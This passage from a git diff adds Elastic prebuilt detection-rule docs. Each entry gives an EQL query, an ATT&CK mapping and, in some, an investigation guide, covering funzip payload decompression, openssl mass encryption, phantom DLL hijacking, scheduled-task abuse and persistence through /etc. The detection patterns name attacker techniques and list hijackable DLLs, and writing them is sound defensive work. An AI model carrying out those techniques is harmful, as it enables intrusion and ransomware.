T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc new file mode 100644 index 0000000000..cbf3819f1b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc @@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip]] +=== Suspicious Content Extracted or Decompressed via Funzip + +Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/software/S0482/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +((process.args == "tail" and process.args == "-c" and process.args == "funzip")) and +not process.args : "/var/log/messages" and +not process.parent.executable : ("/usr/bin/dracut", "/sbin/dracut", "/usr/bin/xargs") and +not (process.parent.name in ("sh", "sudo") and process.parent.command_line : "*nessus_su*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc new file mode 100644 index 0000000000..a8977c996c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility]] +=== Suspicious Data Encryption via OpenSSL Utility + +Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/ +* https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, user.name, process.parent.entity_id with maxspan=5s + [ process where host.os.type == "linux" and event.action == "exec" and + process.name == "openssl" and process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "perl*", "php*", "python*", "xargs") and + process.args == "-in" and process.args == "-out" and + process.args in ("-k", "-K", "-kfile", "-pass", "-iv", "-md") and + /* excluding base64 encoding options and including encryption password or key params */ + not process.args in ("-d", "-a", "-A", "-base64", "-none", "-nosalt") ] with runs=10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc new file mode 100644 index 0000000000..c8a4da9876 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc @@ -0,0 +1,168 @@ +[[prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation]] +=== Suspicious DLL Loaded for Persistence or Privilege Escalation + +Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://itm4n.github.io/windows-dll-hijacking-clarified/ +* http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html +* https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html +* https://shellz.club/2020/10/16/edgegdi-dll-for-persistence-and-lateral-movement.html +* https://windows-internals.com/faxing-your-way-to-system/ +* http://waleedassar.blogspot.com/2013/01/wow64logdll.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation + +Attackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process. + +#### Possible investigation steps + +- Examine the DLL signature and identify the process that created it. + - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve the DLL and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("driver", "library") or (event.category == "process" and event.action : "Image loaded*")) and + ( + /* compatible with Elastic Endpoint Library Events */ + (dll.name : ("wlbsctrl.dll", "wbemcomn.dll", "WptsExtensions.dll", "Tsmsisrv.dll", "TSVIPSrv.dll", "Msfte.dll", + "wow64log.dll", "WindowsCoreDeviceInfo.dll", "Ualapi.dll", "wlanhlp.dll", "phoneinfo.dll", "EdgeGdi.dll", + "cdpsgshims.dll", "windowsperformancerecordercontrol.dll", "diagtrack_win.dll", "oci.dll", "TPPCOIPW32.dll", + "tpgenlic.dll", "thinmon.dll", "fxsst.dll", "msTracer.dll") + and (dll.code_signature.trusted != true or dll.code_signature.exists != true)) or + + /* compatible with Sysmon EventID 7 - Image Load */ + (file.name : ("wlbsctrl.dll", "wbemcomn.dll", "WptsExtensions.dll", "Tsmsisrv.dll", "TSVIPSrv.dll", "Msfte.dll", + "wow64log.dll", "WindowsCoreDeviceInfo.dll", "Ualapi.dll", "wlanhlp.dll", "phoneinfo.dll", "EdgeGdi.dll", + "cdpsgshims.dll", "windowsperformancerecordercontrol.dll", "diagtrack_win.dll", "oci.dll", "TPPCOIPW32.dll", + "tpgenlic.dll", "thinmon.dll", "fxsst.dll", "msTracer.dll") and + not file.path : ("?:\\Windows\\System32\\wbemcomn.dll", "?:\\Windows\\SysWOW64\\wbemcomn.dll") and + not file.hash.sha256 : + ("6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f", + "b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4", + "c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662") and + not file.code_signature.status == "Valid") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Search Order Hijacking +** ID: T1574.001 +** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc new file mode 100644 index 0000000000..7c2244af4d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc @@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process]] +=== Suspicious Endpoint Security Parent Process + +A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("esensor.exe", "elastic-endpoint.exe") and + process.parent.executable != null and + /* add FPs here */ + not process.parent.executable : ("C:\\Program Files\\Elastic\\*", + "C:\\Windows\\System32\\services.exe", + "C:\\Windows\\System32\\WerFault*.exe", + "C:\\Windows\\System32\\wermgr.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc new file mode 100644 index 0000000000..61c1563fbe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc @@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device]] +=== Suspicious Execution from a Mounted Device + +Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ +* https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*" and + (process.working_directory : "?:\\" and not process.working_directory: "C:\\") and + process.parent.name : "explorer.exe" and + process.name : ("rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "regsvr32.exe", + "cscript.exe", "wscript.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc new file mode 100644 index 0000000000..79d3b8eb10 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task]] +=== Suspicious Execution via Scheduled Task + +Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + /* Schedule service cmdline on Win10+ */ + process.parent.name : "svchost.exe" and process.parent.args : "Schedule" and + /* add suspicious programs here */ + process.pe.original_file_name in + ( + "cscript.exe", + "wscript.exe", + "PowerShell.EXE", + "Cmd.Exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + "REGSVR32.EXE", + "MSBuild.exe", + "InstallUtil.exe", + "RegAsm.exe", + "RegSvcs.exe", + "msxsl.exe", + "CONTROL.EXE", + "EXPLORER.EXE", + "Microsoft.Workflow.Compiler.exe", + "msiexec.exe" + ) and + /* add suspicious paths here */ + process.args : ( + "C:\\Users\\*", + "C:\\ProgramData\\*", + "C:\\Windows\\Temp\\*", + "C:\\Windows\\Tasks\\*", + "C:\\PerfLogs\\*", + "C:\\Intel\\*", + "C:\\Windows\\Debug\\*", + "C:\\HP\\*") and + + not (process.name : "cmd.exe" and process.args : "?:\\*.bat" and process.working_directory : "?:\\Windows\\System32\\") and + not (process.name : "cscript.exe" and process.args : "?:\\Windows\\system32\\calluxxprovider.vbs") and + not (process.name : "powershell.exe" and process.args : ("-File", "-PSConsoleFile") and user.id : "S-1-5-18") and + not (process.name : "msiexec.exe" and user.id : "S-1-5-18") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc new file mode 100644 index 0000000000..aa502fffa4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-10-5-suspicious-explorer-child-process]] +=== Suspicious Explorer Child Process + +Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "rundll32.exe", "cmd.exe", "mshta.exe", "regsvr32.exe") or + process.pe.original_file_name in ("cscript.exe", "wscript.exe", "PowerShell.EXE", "RUNDLL32.EXE", "Cmd.Exe", "MSHTA.EXE", "REGSVR32.EXE") + ) and + /* Explorer started via DCOM */ + process.parent.name : "explorer.exe" and process.parent.args : "-Embedding" and + not process.parent.args: + ( + /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */ + "/factory,{5BD95610-9434-43C2-886C-57852CC8A120}", + "/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc new file mode 100644 index 0000000000..9c8062db7f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc @@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected]] +=== Suspicious File Changes Activity Detected + +This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=1s + [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and + file.path : ( + "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc new file mode 100644 index 0000000000..67627e609d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence]] +=== Suspicious File Creation in /etc for Persistence + +Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ +* https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Threat: Lightning Framework +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type in ("creation", "file_create_event") and user.name == "root" and +file.path : ("/etc/ld.so.conf.d/*", "/etc/cron.d/*", "/etc/sudoers.d/*", "/etc/rc.d/init.d/*", "/etc/systemd/system/*", +"/usr/lib/systemd/system/*") and not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/rpm", "*/systemd", +"*/snapd", "*/dnf-automatic","*/yum-cron", "*/elastic-agent", "*/dnfdaemon-system", "*/bin/dockerd", "*/sbin/dockerd", +"/kaniko/executor", "/usr/sbin/rhn_check") and not file.extension in ("swp", "swpx", "tmp") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** 